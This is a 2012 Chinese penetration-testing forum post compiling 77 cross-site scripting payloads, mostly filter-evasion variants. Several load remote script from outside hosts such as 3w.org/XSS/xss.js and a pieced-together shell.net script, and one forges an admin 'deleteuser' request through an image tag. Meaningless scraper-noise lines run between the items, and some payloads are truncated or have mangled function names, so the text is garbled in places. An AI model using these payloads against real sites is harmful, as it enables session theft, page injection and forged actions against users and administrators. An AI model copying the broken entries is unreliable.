中国网络渗透测试联盟
标题:
xss跨站脚本攻击汇总
[打印本页]
作者:
admin
时间:
2012-9-5 14:56
标题:
xss跨站脚本攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
! T/ Q! a2 c$ v" n1 S3 ^: K( ?
# ~ ?' q# s0 |! \( M) Y
(1)普通的XSS JavaScript注入
' Z, x, ]) m! x/ Y3 c) A9 P7 k; H; M
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) b7 k1 h; I/ [% [: c
/ ] A" s* s6 E5 k N
(2)IMG标签XSS使用JavaScript命令
. i: m" }$ Q4 g+ i1 Z" s3 ^
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* N6 u. W+ c' `" J; X8 i1 ^$ C
- s9 U7 b, b4 x2 U4 C6 g
(3)IMG标签无分号无引号
* m p7 _6 S9 U5 q
<IMG SRC=javascript:alert(‘XSS’)>
8 }4 P9 M# F) t) @
3 @4 {, n" a6 B
(4)IMG标签大小写不敏感
! U; T6 Q7 ~# l! j) v( D1 O1 ~4 s
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
2 g8 H9 n; i( l8 v G- T0 V& O
. W: E" w0 Y8 w' v. S
(5)HTML编码(必须有分号)
2 w2 o' x" b9 H% l, O. l5 ~% w( M
<IMG SRC=javascript:alert(“XSS”)>
, L- N, k: \6 K- l( f( o7 j
4 R& X8 @9 p- q3 x
(6)修正缺陷IMG标签
o3 U c" {7 K: [5 A5 [( R
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ B" `# j. ^" l9 G
* J. z/ E% ~2 p
(7)formCharCode标签(计算器)
( [1 M6 t" ^. r1 N0 |! s
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
: {1 E1 u8 w) P9 \5 K% A) W( k
! V$ i7 b9 l& Q* w- t: Y1 Y
(8)UTF-8的Unicode编码(计算器)
9 |: x9 Z: }& Q; z' ~7 i
<IMG SRC=jav..省略..S')>
0 e& p1 n1 _/ d# Z: s/ Q
# r3 b% q& [. s" B' G) z
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
6 K! c+ }7 U' V4 `! c( |
<IMG SRC=jav..省略..S')>
$ P2 X9 y$ R0 o. m: B/ o& j- s
' n+ M/ O( J* x, \ |# \5 a
(10)十六进制编码也是没有分号(计算器)
9 |/ g$ H: |5 A1 Q# j c
<IMG SRC=java..省略..XSS')>
4 D3 q# S& t- U) `0 S( L
& q2 F+ P8 c; H) u: j
(11)嵌入式标签,将Javascript分开
% e0 O$ u( A: P! E
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 D) Y! O, D4 A
3 x8 _1 F- Z5 `
(12)嵌入式编码标签,将Javascript分开
" k2 C! c! j: q* A" H M% l
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& |8 ]. L5 J7 @3 ^' n: j4 {, q
$ Z) e- O8 e7 x8 W: q6 H- o
(13)嵌入式换行符
7 x( `0 z, y+ K1 Z2 g3 q9 B
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' ~6 k, V5 Z2 b& I$ i) \
" x% `5 j# O+ p- A! [$ q2 {6 E/ m
(14)嵌入式回车
$ v7 h1 U8 }5 T4 F! \0 J
<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 A# [' ~- p1 j; o" I3 j
& p% x/ u1 X8 P' ?
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
* Y3 A; b1 j1 J7 A. C' X! z
<IMG SRC=”javascript:alert(‘XSS‘)”>
( |' F0 D2 x0 ^
% w: a8 C: z3 T" ~* L- y, h, {5 v& W
(16)解决限制字符(要求同页面)
* S7 F' D Z5 S, f* M9 A
<script>z=’document.’</script>
) D0 O8 g8 L" ]- k$ y! |" C
<script>z=z+’write(“‘</script>
& c- r. N1 S6 X) u( V n
<script>z=z+’<script’</script>
F* V3 d7 U; a
<script>z=z+’ src=ht’</script>
4 M1 j9 D j& f1 v5 V: v
<script>z=z+’tp://ww’</script>
( H; j/ r1 m& v
<script>z=z+’w.shell’</script>
/ H. ^3 }( a) C' e5 q% u
<script>z=z+’.net/1.’</script>
+ ]2 u, v; h% X0 j
<script>z=z+’js></sc’</script>
" x1 |' X1 m! n2 D
<script>z=z+’ript>”)’</script>
' [4 ~- ~- R9 t) f, U* f
<script>eval_r(z)</script>
& D) S1 c' w, e
9 H' _3 V; f9 Y8 N( `" c
(17)空字符
2 m( `; ^6 r& ^" h$ X
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
* j/ v7 ?% Y. I! I
4 f. r5 H8 M1 F1 g
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
7 s" P$ E/ B+ }& b L
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
4 ` h* ]: g& i! k$ W' }, n Z
' E; J! }4 u+ l$ \5 ^# _
(19)Spaces和meta前的IMG标签
; Z/ h4 K% J: C% g7 c! f, B7 B8 P: y# y
<IMG SRC=” javascript:alert(‘XSS’);”>
, t: |% K7 u8 q% d- M
/ t0 E. j% S" l! `
(20)Non-alpha-non-digit XSS
; M# z( y3 j2 j. L% ~
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
! C3 j6 O/ q5 H
: b$ j2 J' ?, D8 S
(21)Non-alpha-non-digit XSS to 2
. `! g. U+ v0 `1 p2 \1 v2 N1 g# ^+ L
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
. ^; q7 J& X7 S0 I+ d
6 U8 K/ n# u- q/ L7 ?& W' m
(22)Non-alpha-non-digit XSS to 3
. E7 {5 S3 @+ `5 i @) D7 N$ \: X
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
% L+ Z4 y0 w$ n1 X G
( B- P- c e8 g Z8 V% S' n
(23)双开括号
+ v4 B, D# s, u0 R" \) E I! s9 B7 B
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
: ~4 M" Z. p O! s: P1 ~ l6 \
i: o- B A1 H, g/ L
(24)无结束脚本标记(仅火狐等浏览器)
/ q1 \3 ?- M# o5 ?% G5 s, ~
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
; o) O! B" t! a% n
X8 q& P/ @# a6 E6 U8 O
(25)无结束脚本标记2
& O% R7 l# m$ q* \, {* j
<SCRIPT SRC=//3w.org/XSS/xss.js>
4 P4 x8 T' G" j& e
: q( [- |" T |: ^3 U6 f
(26)半开的HTML/JavaScript XSS
' ^" k" x* A$ S4 O7 U6 e9 B- {, u
<IMG SRC=”javascript:alert(‘XSS’)”
0 h0 u9 m" k$ u3 u. q" H S3 Y3 ?
! q# S! ?- u" L$ k
(27)双开角括号
8 g( i+ w4 s& M
<iframe src=http://3w.org/XSS.html <
! p% V! W) J+ {& p& q
1 C3 r; W" g# o
(28)无单引号 双引号 分号
7 B7 O; J, m3 w% w$ ?/ r
<SCRIPT>a=/XSS/
$ X4 J" W0 m( Q" E* d5 Q# q0 j
alert(a.source)</SCRIPT>
5 M% F1 I ?# M
; |2 f- B; F8 G0 ~, s
(29)换码过滤的JavaScript
) @) L% q5 K1 e, G" R1 O
\”;alert(‘XSS’);//
8 b: }# T2 T* t, l" p7 }
5 Y% S! A, ]+ E
(30)结束Title标签
9 t* V6 \ ?4 W) P( m
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
* m) ?/ A+ ^) k ~
3 y, ]+ h* W* |, Y* }- p
(31)Input Image
' A: e, R7 T1 ]. \
<INPUT SRC=”javascript:alert(‘XSS’);”>
, e% @: a3 B' V
% {+ U6 |2 o" f3 d" c0 E" Q
(32)BODY Image
" e- m! r5 E* ^8 ?* @* Q0 L! M
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
7 d, k x( y( ~: U
' w( H: S( i- A- b3 y1 f- c
(33)BODY标签
+ v' Q( l0 z" ?% \$ i/ w+ t+ Q
<BODY(‘XSS’)>
$ a( O: g% _5 R/ T: A9 p
" M+ e" k8 O& n9 c1 B
(34)IMG Dynsrc
+ ^/ k# z5 J$ z0 b$ J0 v: r
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
t1 x+ x, ?2 R; L0 L$ H
' [( ?5 m- w8 O5 D/ _% o
(35)IMG Lowsrc
. R9 O2 c& O8 x6 H
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
7 }' d j) a% ]/ S& s9 B4 s0 k
" d$ S! u5 H b/ X
(36)BGSOUND
+ P- ]$ c% B0 }
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
% q, G0 A2 e7 r$ O+ T
5 z; s) C) `# L) v% K3 u+ `
(37)STYLE sheet
8 W" o* P$ z3 `5 P
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
( I0 v! i5 V- b! N
+ Q) Q6 V# v" J4 r+ [2 H
(38)远程样式表
) g4 P5 k& a- c) Q- E3 C
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
! Y' B! C/ U! U; v
% x1 Z- {" [$ Q5 F6 P5 H; M. S$ m
(39)List-style-image(列表式)
: t. f+ [4 o L8 I# J5 f
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
6 n+ J! J- M; a8 {( u$ s
# J5 z o0 m5 q; V
(40)IMG VBscript
2 {: H4 k6 \1 V4 `( I% u& x* b! e
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
0 l5 K4 L" C% X9 M0 S
1 R5 a7 i6 {5 E1 |! e
(41)META链接url
( y4 w+ s5 u7 D) G6 c$ O
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
9 V1 ~, `+ m) @9 x. t% A# G
/ M2 L: ], S5 N2 i% L0 z
(42)Iframe
$ I- p/ R& P3 R+ @% \. o' | O, m
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
4 O, }5 U' B+ a. k4 L
9 n, ]4 D+ i4 n3 i K$ y$ z( J6 b$ S
(43)Frame
0 ^7 f9 R0 }: p, s" m0 ^
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
7 H+ P7 n/ m: J) v
3 f$ I1 z" c' v
(44)Table
4 Q* S2 _ _5 U9 N4 L' \
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
2 `( b) i, Q3 a6 D9 d) H
8 V. |# p* g5 O# A; `
(45)TD
4 U* \+ C P/ J P4 E
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
0 z Y1 I& M, i; j0 L
; B3 S7 E2 e" p8 f' q2 V9 x
(46)DIV background-image
1 g, I2 R' N7 V/ g' @0 Z
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- I. d6 v7 M. P, A# [5 j
+ f' X% @6 o# J3 z
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
. f0 a. D9 R% t/ i' a- x7 ~6 P( l
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
0 P! U* {8 [! O5 }1 F- I% J6 \" p5 `
" j# @0 `; H! u0 f# \5 c5 o+ p3 C# @
(48)DIV expression
8 k7 y3 Z2 a. U W3 P" F7 P% W
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
) x! H9 k/ D3 r3 i: H/ ]; D, N/ @9 O
$ {* W5 Y( n) Y: j/ |$ `; m
(49)STYLE属性分拆表达
. k" G: N/ R M: p7 M
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
+ z4 l/ q- f" E; t$ |# D! S! U
) W+ U0 C" j# I8 s
(50)匿名STYLE(组成:开角号和一个字母开头)
3 l9 B/ E# \: s8 v0 l4 D' i6 m
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
/ J' y9 t8 Q0 c
9 F2 v8 J, j% y; X
(51)STYLE background-image
& P- {; ?" X5 | F% c
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
# F" _7 v6 L! J' g1 o( N* b
F, a+ }1 e& |
(52)IMG STYLE方式
7 W: n+ s# g9 B( [. n' I
exppression(alert(“XSS”))’>
+ s) i6 B, ]' F7 f
/ d7 j" d5 \0 m9 q
(53)STYLE background
6 s9 r) J3 c1 k, W+ Q: R
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
# J. k! u* b+ f: a+ t' [3 W
4 q- m+ h! k* K9 R' `* y
(54)BASE
. Y' }+ }. ~4 a6 q
<BASE HREF=”javascript:alert(‘XSS’);//”>
+ K* D- O/ {" d8 U) _
( F. A3 w1 ~" D0 j
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
2 D: N! o6 ?) n5 o" _
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
7 d& ^1 I: C l* s6 R; V% D
" N( x: ~: D" t2 v/ P
(56)在flash中使用ActionScrpt可以混进你XSS的代码
% e% e7 z J! |( t8 X" s
a=”get”;
! N" V; u; K! A) W: J( u" m
b=”URL(\”";
, G0 e1 q/ h% Y4 v' Y
c=”javascript:”;
! h1 s* G$ ~8 f* l/ i% n2 ]1 j: T
d=”alert(‘XSS’);\”)”;
* R) |( U; j! B! E) z
eval_r(a+b+c+d);
. K2 b) B- M, B
, w& p4 j- {: v9 F% I" E
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
& p! `4 M) S/ s z" Y. x
<HTML xmlns:xss>
9 z( a* Z0 M: D9 H; p9 _3 R+ S" [
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
, a$ _( C1 I/ \/ G
<xss:xss>XSS</xss:xss>
0 P, M+ K; G4 {, N1 r
</HTML>
( [+ O/ f. \: L4 |# N- |" |& X. Z. |
2 H; g f; [, X% a( q
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
% |- e7 |, S" [' v3 F$ I+ w! v3 j
<SCRIPT SRC=””></SCRIPT>
) z" a+ M2 Z+ Z/ H) R; u, M7 d
4 [9 g( u) V' n x0 }
(59)IMG嵌入式命令,可执行任意命令
$ ^5 b" V: J3 m
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
, {, S) T9 C x, W( s
2 A0 R% C; F$ d" x6 m2 ]5 M5 C2 \
(60)IMG嵌入式命令(a.jpg在同服务器)
/ T9 l3 h8 H# [
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
( t3 o) J& H' t$ G7 {( R
0 d$ U# Q- T" O9 o1 O$ ?2 e7 Y: w
(61)绕符号过滤
7 ]$ y) j- C3 H1 e6 k2 B+ \
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
8 q/ s; x( \' g
3 p9 l+ \- w: d1 i) @5 K/ ~
(62)
4 G8 X1 ~6 R+ B' k
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
d0 |- j% ?: R5 h$ X4 m0 A
3 g. j' k5 R; w9 X. x. ^; Q+ z
(63)
( o0 q+ e. ^ l
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
k' `$ B1 |* F1 k; l
+ I; }+ ^ |& G: p1 [) j8 W
(64)
& X, T1 w9 ?* B4 T! R3 f0 b
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
. J3 u! n# d& o4 H
4 p- s" s, e: E! M
(65)
/ B! ~, `' J+ k, \+ o* B ]
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
7 r" X7 K7 w* _+ I& C* O6 ]$ y
+ N+ q+ F- H |- u" ^7 r
(66)
6 u. M! r/ c1 `5 [
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
/ ~8 v4 e5 e3 K$ n" N# r) h0 }
& a0 X* ^7 h% B
(67)
0 \- }6 T. A4 s3 r3 m( R9 E1 Q
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”></SCRIPT>
2 a* ?7 I$ t. W
* p# b, O1 m7 {
(68)URL绕行
5 j% x6 ^2 F& C# T3 A
<A HREF=”
http://127.0.0.1/
”>XSS</A>
: ]6 A- x& }3 V; Z- r$ r
* _3 M5 q; N9 }) l; @' ^' a
(69)URL编码
; o4 y @: ^* @' I# x1 z
<A HREF=”
http://3w.org
”>XSS</A>
2 Y ?7 V4 j4 E2 ]7 n0 C
% D0 m" z% X ?. q) O5 h* F( `
(70)IP十进制
- o5 R" Q+ j% H& i8 ]
<A HREF=”http://3232235521″>XSS</A>
8 x1 U% ~5 F( t7 K- L+ Y" Z6 Y
0 k8 B) ?2 ^; f0 F% |
(71)IP十六进制
8 Q4 T+ U$ n+ d
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
# O) D$ O) V- g5 G& E
) f" s3 h% \5 a: Y' N) {
(72)IP八进制
5 r3 k+ q- x: F8 |1 @
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
$ V' h/ s/ I3 ?, C. E3 m
( W7 F. [1 x) @
(73)混合编码
8 b' H- R6 k. G! m( b; S# S
<A HREF=”h
3 W7 N: D& r) O
tt p://6 6.000146.0×7.147/”">XSS</A>
3 q8 L6 G/ }5 f4 g$ U: \
% P; z' k! E! M( b% K
(74)节省[http:]
4 w" [/ o, a5 [* o/ _6 K$ U
<A HREF=”//www.google.com/”>XSS</A>
9 u& q- d; I* M
, _/ Y# z1 H* |& H
(75)节省[www]
) p1 J/ b! ~, J. L! P7 k! G) d
<A HREF=”
http://google.com/
”>XSS</A>
- Y! Q. ]; z4 L3 W4 Y1 \4 H* O9 S. W
( s, y* r6 x8 L. Y) |
(76)绝对点绝对DNS
6 g$ w: P* c7 @, m* m& M. E
<A HREF=”
http://www.google.com./
”>XSS</A>
8 l( m" \0 W7 ~: v
+ S( {: l3 S" D7 ]5 x
(77)javascript链接
J" I. D G; W& G
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2